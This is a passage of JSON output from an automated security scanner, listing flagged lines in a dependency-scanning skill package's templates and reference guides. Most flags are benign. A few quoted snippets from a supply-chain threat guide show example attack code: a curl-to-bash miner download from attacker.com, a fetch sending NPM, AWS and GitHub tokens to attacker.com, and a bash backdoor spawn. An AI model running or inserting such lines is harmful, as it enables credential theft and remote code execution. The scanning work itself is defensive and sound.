\"https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html\"","category":"network","line_end":45,"severity":"low","line_start":45},{"id":"network:assets/rule-template.yaml:73:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"See: https://owasp.org/www-community/attacks/SQL_Injection","category":"network","line_end":73,"severity":"low","line_start":73},{"id":"network:assets/rule-template.yaml:118:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://cwe.mitre.org/data/definitions/798.html\"","category":"network","line_end":118,"severity":"low","line_start":118},{"id":"network:assets/rule-template.yaml:119:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password\"","category":"network","line_end":119,"severity":"low","line_start":119},{"id":"network:assets/rule-template.yaml:151:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"See: https://cwe.mitre.org/data/definitions/798.html","category":"network","line_end":151,"severity":"low","line_start":151},{"id":"network:assets/rule-template.yaml:191:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://owasp.org/www-community/attacks/xss/\"","category":"network","line_end":191,"severity":"low","line_start":191},{"id":"network:assets/rule-template.yaml:192:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://cwe.mitre.org/data/definitions/79.html\"","category":"network","line_end":192,"severity":"low","line_start":192},{"id":"network:assets/rule-template.yaml:193:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\"","category":"network","line_end":193,"severity":"low","line_start":193},{"id":"network:assets/rule-template.yaml:217:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"See: https://owasp.org/www-community/attacks/xss/","category":"network","line_end":217,"severity":"low","line_start":217},{"id":"network:assets/rule-template.yaml:260:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://cwe.mitre.org/data/definitions/327.html\"","category":"network","line_end":260,"severity":"low","line_start":260},{"id":"network:assets/rule-template.yaml:261:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"- \"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testin","category":"network","line_end":261,"severity":"low","line_start":261},{"id":"network:assets/rule-template.yaml:288:hardcoded-url","file":"assets/rule-template.yaml","pattern":"Hardcoded URL","snippet":"See: https://cwe.mitre.org/data/definitions/327.html","category":"network","line_end":288,"severity":"low","line_start":288},{"id":"env_access:assets/rule-template.yaml:148:environment-variable-access-dot-notation","file":"assets/rule-template.yaml","pattern":"Environment variable access (dot notation)","snippet":"- Node.js: process.env.API_KEY","category":"env_access","line_end":148,"severity":"low","line_start":148},{"id":"env_access:assets/rule-template.yaml:148:environment-variable-object","file":"assets/rule-template.yaml","pattern":"Environment variable object","snippet":"- Node.js: process.env.API_KEY","category":"env_access","line_end":148,"severity":"low","line_start":148},{"id":"env_access:assets/rule-template.yaml:147:python-environment-access","file":"assets/rule-template.yaml","pattern":"Python environment access","snippet":"- Python: os.environ.get('API_KEY')","category":"env_access","line_end":147,"severity":"low","line_start":147},{"id":"env_access:assets/rule-template.yaml:162:python-environment-access","file":"assets/rule-template.yaml","pattern":"Python environment access","snippet":"api_key = os.environ.get('API_KEY')","category":"env_access","line_end":162,"severity":"low","line_start":162},{"id":"env_access:assets/rule-template.yaml:132:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"api_key = \"...\"","category":"env_access","line_end":132,"severity":"high","line_start":132},{"id":"env_access:assets/rule-template.yaml:147:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"- Python: os.environ.get('API_KEY')","category":"env_access","line_end":147,"severity":"high","line_start":147},{"id":"env_access:assets/rule-template.yaml:148:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"- Node.js: process.env.API_KEY","category":"env_access","line_end":148,"severity":"high","line_start":148},{"id":"env_access:assets/rule-template.yaml:156:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"api_key = \"sk-1234567890abcdef\"","category":"env_access","line_end":156,"severity":"high","line_start":156},{"id":"env_access:assets/rule-template.yaml:157:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"api.authenticate(api_key)","category":"env_access","line_end":157,"severity":"high","line_start":157},{"id":"env_access:assets/rule-template.yaml:162:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"api_key = os.environ.get('API_KEY')","category":"env_access","line_end":162,"severity":"high","line_start":162},{"id":"env_access:assets/rule-template.yaml:163:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"if not api_key:","category":"env_access","line_end":163,"severity":"high","line_start":163},{"id":"env_access:assets/rule-template.yaml:164:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"raise ValueError(\"API_KEY environment variable not set\")","category":"env_access","line_end":164,"severity":"high","line_start":164},{"id":"env_access:assets/rule-template.yaml:165:generic-api-secret-keys","file":"assets/rule-template.yaml","pattern":"Generic API/secret keys","snippet":"api.authenticate(api_key)","category":"env_access","line_end":165,"severity":"high","line_start":165},{"id":"sensitive:assets/rule-template.yaml:148:environment-file-access","file":"assets/rule-template.yaml","pattern":"Environment file access","snippet":"- Node.js: process.env.API_KEY","category":"sensitive","line_end":148,"severity":"high","line_start":148},{"id":"blocker:assets/rule-template.yaml:70:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"- Python: cursor.execute(\"SELECT * FROM users WHERE id = ?\", (user_id,))","category":"blocker","line_end":70,"severity":"low","line_start":70},{"id":"blocker:assets/rule-template.yaml:71:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"- JavaScript: db.query(\"SELECT * FROM users WHERE id = $1\", [userId])","category":"blocker","line_end":71,"severity":"low","line_start":71},{"id":"blocker:assets/rule-template.yaml:83:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"user_id = request.GET['id']","category":"blocker","line_end":83,"severity":"low","line_start":83},{"id":"blocker:assets/rule-template.yaml:84:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"query = \"SELECT * FROM users WHERE id = \" + user_id","category":"blocker","line_end":84,"severity":"low","line_start":84},{"id":"blocker:assets/rule-template.yaml:89:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"user_id = request.GET['id']","category":"blocker","line_end":89,"severity":"low","line_start":89},{"id":"blocker:assets/rule-template.yaml:90:system-reconnaissance","file":"assets/rule-template.yaml","pattern":"System reconnaissance","snippet":"query = \"SELECT * FROM users WHERE id = ?\"","category":"blocker","line_end":90,"severity":"low","line_start":90},{"id":"blocker:references/cve_cwe_owasp_mapping.md:336:metasploit-framework","file":"references/cve_cwe_owasp_mapping.md","pattern":"Metasploit framework","snippet":"- Exploit availability (PoC, Metasploit module, etc.)","category":"blocker","line_end":336,"severity":"critical","line_start":336},{"id":"blocker:references/cve_cwe_owasp_mapping.md:195:system-reconnaissance","file":"references/cve_cwe_owasp_mapping.md","pattern":"System reconnaissance","snippet":"- Remediation: Upgrade to patched versions, avoid deserializing untrusted data","category":"blocker","line_end":195,"severity":"low","line_start":195},{"id":"blocker:references/cve_cwe_owasp_mapping.md:50:network-reconnaissance","file":"references/cve_cwe_owasp_mapping.md","pattern":"Network reconnaissance","snippet":"- CVE-2022-21449 (Java ECDSA) - Signature validation bypass","category":"blocker","line_end":51,"severity":"low","line_start":50},{"id":"blocker:references/cve_cwe_owasp_mapping.md:238:network-reconnaissance","file":"references/cve_cwe_owasp_mapping.md","pattern":"Network reconnaissance","snippet":"- JWT signature bypass","category":"blocker","line_end":239,"severity":"low","line_start":238},{"id":"scripts:references/EXAMPLE.md:138:document-write-injection","file":"references/EXAMPLE.md","pattern":"document.write injection","snippet":"document.write(userInput);","category":"scripts","line_end":138,"severity":"high","line_start":138},{"id":"scripts:references/EXAMPLE.md:137:innerhtml-assignment-xss-risk","file":"references/EXAMPLE.md","pattern":"innerHTML assignment (XSS risk)","snippet":"element.innerHTML = userInput;","category":"scripts","line_end":137,"severity":"medium","line_start":137},{"id":"env_access:references/EXAMPLE.md:423:python-environment-access","file":"references/EXAMPLE.md","pattern":"Python environment access","snippet":"VALID_API_KEY = os.environ.get('API_KEY')","category":"env_access","line_end":423,"severity":"low","line_start":423},{"id":"env_access:references/EXAMPLE.md:423:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"VALID_API_KEY = os.environ.get('API_KEY')","category":"env_access","line_end":423,"severity":"high","line_start":423},{"id":"env_access:references/EXAMPLE.md:424:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"if not VALID_API_KEY:","category":"env_access","line_end":424,"severity":"high","line_start":424},{"id":"env_access:references/EXAMPLE.md:425:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"raise ValueError(\"API_KEY environment variable not set\")","category":"env_access","line_end":425,"severity":"high","line_start":425},{"id":"env_access:references/EXAMPLE.md:427:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"def require_api_key(f):","category":"env_access","line_end":427,"severity":"high","line_start":427},{"id":"env_access:references/EXAMPLE.md:430:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"api_key = request.headers.get('X-API-Key')","category":"env_access","line_end":430,"severity":"high","line_start":430},{"id":"env_access:references/EXAMPLE.md:432:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"if not api_key:","category":"env_access","line_end":432,"severity":"high","line_start":432},{"id":"env_access:references/EXAMPLE.md:437:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"if not hmac.compare_digest(api_key, VALID_API_KEY):","category":"env_access","line_end":437,"severity":"high","line_start":437},{"id":"env_access:references/EXAMPLE.md:444:generic-api-secret-keys","file":"references/EXAMPLE.md","pattern":"Generic API/secret keys","snippet":"@require_api_key","category":"env_access","line_end":444,"severity":"high","line_start":444},{"id":"blocker:references/EXAMPLE.md:276:c2-keywords","file":"references/EXAMPLE.md","pattern":"C2 keywords","snippet":"- **T1041**: Exfiltration Over C2 Channel","category":"blocker","line_end":276,"severity":"high","line_start":276},{"id":"blocker:references/EXAMPLE.md:97:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"query = \"SELECT * FROM users WHERE id = \" + user_id","category":"blocker","line_end":97,"severity":"low","line_start":97},{"id":"blocker:references/EXAMPLE.md:113:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"query = \"SELECT * FROM users WHERE id = ?\"","category":"blocker","line_end":113,"severity":"low","line_start":113},{"id":"blocker:references/EXAMPLE.md:242:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"- **T1078**: Valid Accounts","category":"blocker","line_end":242,"severity":"low","line_start":242},{"id":"blocker:references/EXAMPLE.md:298:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"cursor.execute(\"SELECT * FROM users WHERE id = ?\", (user_id,))","category":"blocker","line_end":298,"severity":"low","line_start":298},{"id":"blocker:references/EXAMPLE.md:301:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"cursor.execute(\"SELECT * FROM users WHERE id = %s\", (user_id,))","category":"blocker","line_end":301,"severity":"low","line_start":301},{"id":"blocker:references/EXAMPLE.md:305:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"result = session.execute(text(\"SELECT * FROM users WHERE id = :id\"), {\"id\": user_id})","category":"blocker","line_end":305,"severity":"low","line_start":305},{"id":"blocker:references/EXAMPLE.md:314:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"raise ValueError(\"Invalid user ID format\")","category":"blocker","line_end":314,"severity":"low","line_start":314},{"id":"blocker:references/EXAMPLE.md:438:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"return jsonify({'error': 'Invalid API key'}), 403","category":"blocker","line_end":438,"severity":"low","line_start":438},{"id":"blocker:references/EXAMPLE.md:471:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"is_valid = verify_password(\"user_password\", stored_hash)  # True","category":"blocker","line_end":471,"severity":"low","line_start":471},{"id":"blocker:references/EXAMPLE.md:523:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"raise ValueError(\"Invalid file type\")","category":"blocker","line_end":523,"severity":"low","line_start":523},{"id":"blocker:references/EXAMPLE.md:529:system-reconnaissance","file":"references/EXAMPLE.md","pattern":"System reconnaissance","snippet":"import uuid","category":"blocker","line_end":530,"severity":"low","line_start":529},{"id":"blocker:references/EXAMPLE.md:381:network-reconnaissance","file":"references/EXAMPLE.md","pattern":"Network reconnaissance","snippet":"- xss","category":"blocker","line_end":382,"severity":"low","line_start":381},{"id":"network:references/license_risk_guide.md:361:hardcoded-url","file":"references/license_risk_guide.md","pattern":"Hardcoded URL","snippet":"The Apache Software Foundation (http://www.apache.org/).","category":"network","line_end":361,"severity":"low","line_start":361},{"id":"blocker:references/license_risk_guide.md:237:system-reconnaissance","file":"references/license_risk_guide.md","pattern":"System reconnaissance","snippet":"**Avoid Unless**: Prepared to open-source entire application","category":"blocker","line_end":237,"severity":"low","line_start":237},{"id":"blocker:references/license_risk_guide.md:280:system-reconnaissance","file":"references/license_risk_guide.md","pattern":"System reconnaissance","snippet":"- Solution: Avoid AGPL or use commercial license","category":"blocker","line_end":280,"severity":"low","line_start":280},{"id":"scripts:references/remediation_strategies.md:249:dynamic-code-evaluation-with-eval","file":"references/remediation_strategies.md","pattern":"Dynamic code evaluation with eval()","snippet":"const result = eval(userInput);","category":"scripts","line_end":249,"severity":"high","line_start":249},{"id":"network:references/remediation_strategies.md:209:http-client-library","file":"references/remediation_strategies.md","pattern":"HTTP client library","snippet":"| request (npm) | axios, node-fetch | Deprecated |","category":"network","line_end":209,"severity":"low","line_start":209},{"id":"network:references/remediation_strategies.md:301:hardcoded-url","file":"references/remediation_strategies.md","pattern":"Hardcoded URL","snippet":"<entry key=\"http://apache.org/xml/features/disallow-doctype-decl\" value=\"true\"/>","category":"network","line_end":301,"severity":"low","line_start":301},{"id":"network:references/remediation_strategies.md:302:hardcoded-url","file":"references/remediation_strategies.md","pattern":"Hardcoded URL","snippet":"<entry key=\"http://xml.org/sax/features/external-general-entities\" value=\"false\"/>","category":"network","line_end":302,"severity":"low","line_start":302},{"id":"blocker:references/remediation_strategies.md:254:system-reconnaissance","file":"references/remediation_strategies.md","pattern":"System reconnaissance","snippet":"throw new Error('Invalid input');","category":"blocker","line_end":254,"severity":"low","line_start":254},{"id":"blocker:references/remediation_strategies.md:263:network-reconnaissance","file":"references/remediation_strategies.md","pattern":"Network reconnaissance","snippet":"- Restrict outbound network access","category":"blocker","line_end":264,"severity":"low","line_start":263},{"id":"scripts:references/supply_chain_threats.md:200:python-exec-function","file":"references/supply_chain_threats.md","pattern":"Python exec() function","snippet":"exec('curl http://attacker.com/miner.sh | bash');","category":"scripts","line_end":200,"severity":"high","line_start":200},{"id":"external_commands:references/supply_chain_threats.md:199:node-js-child-process-module","file":"references/supply_chain_threats.md","pattern":"Node.js child_process module","snippet":"const { exec } = require('child_process');","category":"external_commands","line_end":199,"severity":"high","line_start":199},{"id":"external_commands:references/supply_chain_threats.md:204:node-js-child-process-module","file":"references/supply_chain_threats.md","pattern":"Node.js child_process module","snippet":"const { spawn } = require('child_process');","category":"external_commands","line_end":204,"severity":"high","line_start":204},{"id":"external_commands:references/supply_chain_threats.md:205:process-spawn","file":"references/supply_chain_threats.md","pattern":"Process spawn","snippet":"const shell = spawn('/bin/bash', []);","category":"external_commands","line_end":205,"severity":"high","line_start":205},{"id":"external_commands:references/supply_chain_threats.md:200:process-exec","file":"references/supply_chain_threats.md","pattern":"Process exec","snippet":"exec('curl http://attacker.com/miner.sh | bash');","category":"external_commands","line_end":200,"severity":"high","line_start":200},{"id":"external_commands:references/supply_chain_threats.md:532:shell-command-substitution","file":"references/supply_chain_threats.md","pattern":"Shell command substitution","snippet":"for project in $(get_all_projects); do","category":"external_commands","line_end":532,"severity":"medium","line_start":532},{"id":"external_commands:references/supply_chain_threats.md:205:unix-shell-invocation","file":"references/supply_chain_threats.md","pattern":"Unix shell invocation","snippet":"const shell = spawn('/bin/bash', []);","category":"external_commands","line_end":205,"severity":"medium","line_start":205},{"id":"external_commands:references/supply_chain_threats.md:286:unix-shell-invocation","file":"references/supply_chain_threats.md","pattern":"Unix shell invocation","snippet":"#!/bin/bash","category":"external_commands","line_end":286,"severity":"medium","line_start":286},{"id":"external_commands:references/supply_chain_threats.md:335:unix-shell-invocation","file":"references/supply_chain_threats.md","pattern":"Unix shell invocation","snippet":"#!/bin/bash","category":"external_commands","line_end":335,"severity":"medium","line_start":335},{"id":"external_commands:references/supply_chain_threats.md:513:unix-shell-invocation","file":"references/supply_chain_threats.md","pattern":"Unix shell invocation","snippet":"#!/bin/bash","category":"external_commands","line_end":513,"severity":"medium","line_start":513},{"id":"network:references/supply_chain_threats.md:193:fetch-api-call","file":"references/supply_chain_threats.md","pattern":"Fetch API call","snippet":"fetch('https://attacker.com/collect', {","category":"network","line_end":193,"severity":"low","line_start":193},{"id":"network:references/supply_chain_threats.md:62:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"npm config set @company:registry https://npm.internal.company.com","category":"network","line_end":62,"severity":"low","line_start":62},{"id":"network:references/supply_chain_threats.md:65:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"@company:registry=https://npm.internal.company.com","category":"network","line_end":65,"severity":"low","line_start":65},{"id":"network:references/supply_chain_threats.md:66:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"registry=https://registry.npmjs.org","category":"network","line_end":66,"severity":"low","line_start":66},{"id":"network:references/supply_chain_threats.md:69:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"pip install --index-url https://pypi.internal.company.com package-name","category":"network","line_end":69,"severity":"low","line_start":69},{"id":"network:references/supply_chain_threats.md:75:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"<url>https://maven.internal.company.com</url>","category":"network","line_end":75,"severity":"low","line_start":75},{"id":"network:references/supply_chain_threats.md:193:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"fetch('https://attacker.com/collect', {","category":"network","line_end":193,"severity":"low","line_start":193},{"id":"network:references/supply_chain_threats.md:200:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"exec('curl http://attacker.com/miner.sh | bash');","category":"network","line_end":200,"severity":"low","line_start":200},{"id":"network:references/supply_chain_threats.md:388:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"src=\"https://cdn.example.com/library.js\"","category":"network","line_end":388,"severity":"low","line_start":388},{"id":"network:references/supply_chain_threats.md:412:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"registry=https://artifactory.company.com/api/npm/npm-virtual/","category":"network","line_end":412,"severity":"low","line_start":412},{"id":"network:references/supply_chain_threats.md:413:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"@company:registry=https://artifactory.company.com/api/npm/npm-internal/","category":"network","line_end":413,"severity":"low","line_start":413},{"id":"network:references/supply_chain_threats.md:518:hardcoded-url","file":"references/supply_chain_threats.md","pattern":"Hardcoded URL","snippet":"curl -X POST https://artifactory/api/blocklist \\","category":"network","line_end":518,"severity":"low","line_start":518},{"id":"env_access:references/supply_chain_threats.md:189:environment-variable-access-dot-notation","file":"references/supply_chain_threats.md","pattern":"Environment variable access (dot notation)","snippet":"npm_token: process.env.NPM_TOKEN,","category":"env_access","line_end":189,"severity":"low","line_start":189},{"id":"env_access:references/supply_chain_threats.md:190:environment-variable-access-dot-notation","file":"references/supply_chain_threats.md","pattern":"Environment variable access (dot notation)","snippet":"aws_key: process.env.AWS_ACCESS_KEY_ID,","category":"env_access","line_end":190,"severity":"low","line_start":190},{"id":"env_access:references/supply_chain_threats.md:191:environment-variable-access-dot-notation","file":"references/supply_chain_threats.md","pattern":"Environment variable access (dot notation)","snippet":"github_token: process.env.GITHUB_TOKEN","category":"env_access","line_end":191,"severity":"low","line_start":191},{"id":"env_access:references/supply_chain_threats.md:189:environment-variable-object","file":"references/supply_chain_threats.md","pattern":"Environment variable object","snippet":"npm_token: process.env.NPM_TOKEN,","category":"env_access","line_end":189,"severity":"low","line_start":189},{"id":"env_access:references/supply_chain_threats.md:190:environment-variable-object","file":"references/supply_chain_threats.md","pattern":"Environment variable object","snippet":"aws_key: process.env.AWS_ACCESS_KEY_ID,","category":"env_access","line_end":190,"severity":"low","line_start":190},{"id":"env_access:references/supply_chain_threats.md:191:environment-variable-object","file":"references/supply_chain_threats.md","pattern":"Environment variable object","snippet":"github_token: process.env.GITHUB_TOKEN","category":"env_access","line_end":191,"severity":"low","line_start":191},{"id":"env_access:references/supply_chain_threats.md:190:aws-credential-environment-variables","file":"references/supply_chain_threats.md","pattern":"AWS credential environment variables","snippet":"aws_key: process.env.AWS_ACCESS_KEY_ID,","category":"env_access","line_end":190,"severity":"high","line_start":190},{"id":"env_access:references/supply_chain_threats.md:191:git-platform-tokens","file":"references/supply_chain_threats.md","pattern":"Git platform tokens","snippet":"github_token: process.env.GITHUB_TOKEN","category":"env_access","line_end":191,"severity":"high","line_start":191},{"id":"sensitive:references/supply_chain_threats.md:189:environment-file-access","file":"references/supply_chain_threats.md","pattern":"Environment file access","snippet":"npm_token: process.env.NPM_TOKEN,","category":"sensitive","line_end":189,"severity":"high","line_start":189},{"id":"sensitive:references/supply_chain_threats.md:190:environment-file-access","file":"references/supply_chain_threats.md","pattern":"Environment file access","snippet":"aws_key: process.env.AWS_ACCESS_KEY_ID,","category":"sensitive","line_end":190,"severity":"high","line_start":190},{"id":"sensitive:references/supply_chain_threats.md:191:environment-file-access","file":"references/supply_chain_threats.md","pattern":"Environment file access","snippet":"github_token: process.env.GITHUB_TOKEN","category":"sensitive","line_end":191,"severity":"high","line_start":191},{"id":"sensitive:references/supply_chain_threats.md:64:npm-config-file-may-contain-tokens","file":"references/supply_chain_threats.md","pattern":"NPM config file (may contain tokens)","snippet":"# Configure .npmrc to prefer internal registry","category":"sensitive","line_end":64,"severity":"high","line_start":64},{"id":"sensitive:references/supply_chain_threats.md:411:npm-config-file-may-contain-tokens","file":"references/supply_chain_threats.md","pattern":"NPM config file (may contain tokens)","snippet":"# .npmrc","category":"sensitive","line_end":411,"severity":"high","line_start":411},{"id":"blocker:references/supply_chain_threats.md:20:malware-type-keywords","file":"references/supply_chain_threats.md","pattern":"Malware type keywords","snippet":"1. **Compromised Dependencies** - Legitimate packages backdoored by attackers","category":"blocker","line_end":20,"severity":"high","line_start":20},{"id":"blocker:references/supply_chain_threats.md:181:malware-type-keywords","file":"references/supply_chain_threats.md","pattern":"Malware type keywords","snippet":"- Backdoor installation","category":"blocker","line_end":181,"severity":"high","line_start":181},{"id":"blocker:references/supply_chain_threats.md:202:malware-type-keywords","file":"references/supply_chain_threats.md","pattern":"Malware type keywords","snippet":"// Backdoor","category":"blocker","line_end":202,"severity":"high","line_start":202},{"id":"blocker:references/supply_chain_threats.md:235:malware-type-keywords","file":"references/supply_chain_threats.md","pattern":"Malware type keywords","snippet":"- **SolarWinds (2020)**: Build system compromise led to trojanized software updates","category":"blocker","line_end":235,"severity":"high","line_start":235},{"id":"blocker:references/supply_chain_threats.md:200:pipe-to-shell-pattern","file":"references/supply_chain_threats.md","pattern":"Pipe to shell pattern","snippet":"exec('curl http://attacker.com/miner.sh | bash');","category":"blocker","line_end":200,"severity":"critical","line_start":200},{"id":"blocker:references/supply_chain_threats.md:254:system-reconnaissance","file":"references/supply_chain_threats.md","pattern":"System reconnaissance","snippet":"- Secret management (avoid env vars in logs)","category":"blocker","line_end":254,"severity":"low","line_start":254},{"id":"blocker:references/supply_chain_threats.md:555:system-reconnaissance","file":"references/supply_chain_threats.md","pattern":"System reconnaissance","snippet":"- How did malicious package enter supply chain?","category":"blocker","line_end":555,"severity":"low","line_start":555},{"id":"blocker:references/supply_chain_threats.md:281:network-reconnaissance","file":"references/supply_chain_threats.md","pattern":"Network reconnaissance","snippet":"- Environment variable access","category":"blocker","line_end":282,"severity":"low","line_start":281},{"id":"blocker:references/supply_chain_threats.md:69:non-standard-pypi-index","file":"references/supply_chain_threats.md","pattern":"Non-standard PyPI index","snippet":"pip install --index-url https://pypi.internal.company.com package-name","category":"blocker","line_end":69,"severity":"high","line_start":69},{"id":"blocker:references/WORKFLOW_CHECKLIST.md:193:malware-type-keywords","file":"references/WORKFLOW_CHECKLIST.md","pattern":"Malware type keywords","snippet":"[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)","category":"blocker","line_end":193,"severity":"high","line_start":193},{"id":"external_commands:SKILL.md:40:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":47,"severity":"medium","line_start":40},{"id":"external_commands:SKILL.md:47:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":51,"severity":"medium","line_start":47},{"id":"external_commands:SKILL.md:51:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```bash","category":"external_commands","line_end":57,"severity":"medium","line_start":51},{"id":"external_commands:SKILL.md:57:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"```","category":"external_commands","line_end":65,"severity":"medium","line_start":57},{"id":"external_commands:SKILL.md:65:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"[ ] 2. Run `scripts/blackduck_scan.py` with project detection","category":"external_commands","line_end":79,"severity":"medium","line_start":65},{"id":"external_commands:SKILL.md:79:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- Consult `references/remediation_strategies.md` for vulnerability-specific guidance","category":"external_commands","line_end":97,"severity":"medium","line_start":79},{"id":"external_commands:SKILL.md:97:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"1. Add Black Duck Detect to CI/CD pipeline using `assets/ci_integration/`","category":"external_commands","line_end":151,"severity":"medium","line_start":97},{"id":"external_commands:SKILL.md:151:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `scripts/blackduck_scan.py` - Full-featured scanning with CVE/CWE mapping and reporting","category":"external_commands","line_end":152,"severity":"medium","line_start":151},{"id":"external_commands:SKILL.md:152:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `scripts/analyze_results.py` - Parse Black Duck results and generate remediation report","category":"external_commands","line_end":153,"severity":"medium","line_start":152},{"id":"external_commands:SKILL.md:153:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `scripts/sbom_generator.sh` - Generate SBOM (CycloneDX/SPDX) from scan results","category":"external_commands","line_end":154,"severity":"medium","line_start":153},{"id":"external_commands:SKILL.md:154:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `scripts/policy_checker.py` - Validate compliance with organizational security policies","category":"external_commands","line_end":158,"severity":"medium","line_start":154},{"id":"external_commands:SKILL.md:158:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `references/cve_cwe_owasp_mapping.md` - CVE to CWE and OWASP Top 10 mapping","category":"external_commands","line_end":159,"severity":"medium","line_start":158},{"id":"external_commands:SKILL.md:159:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `references/remediation_strategies.md` - Vulnerability remediation patterns and upgrade strategies","category":"external_commands","line_end":160,"severity":"medium","line_start":159},{"id":"external_commands:SKILL.md:160:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `references/license_risk_guide.md` - License compliance risk assessment and legal guidance","category":"external_commands","line_end":161,"severity":"medium","line_start":160},{"id":"external_commands:SKILL.md:161:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `references/supply_chain_threats.md` - Common supply chain attack patterns and mitigations","category":"external_commands","line_end":165,"severity":"medium","line_start":161},{"id":"external_commands:SKILL.md:165:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `assets/ci_integration/github_actions.yml` - GitHub Actions workflow for Black Duck scanning","category":"external_commands","line_end":166,"severity":"medium","line_start":165},{"id":"external_commands:SKILL.md:166:ruby-shell-backtick-execution","file":"SKILL.md","pattern":"Ruby/shell backtick execution","snippet":"- `assets/ci_integration/gitlab_ci.yml` - GitLab CI configuration for 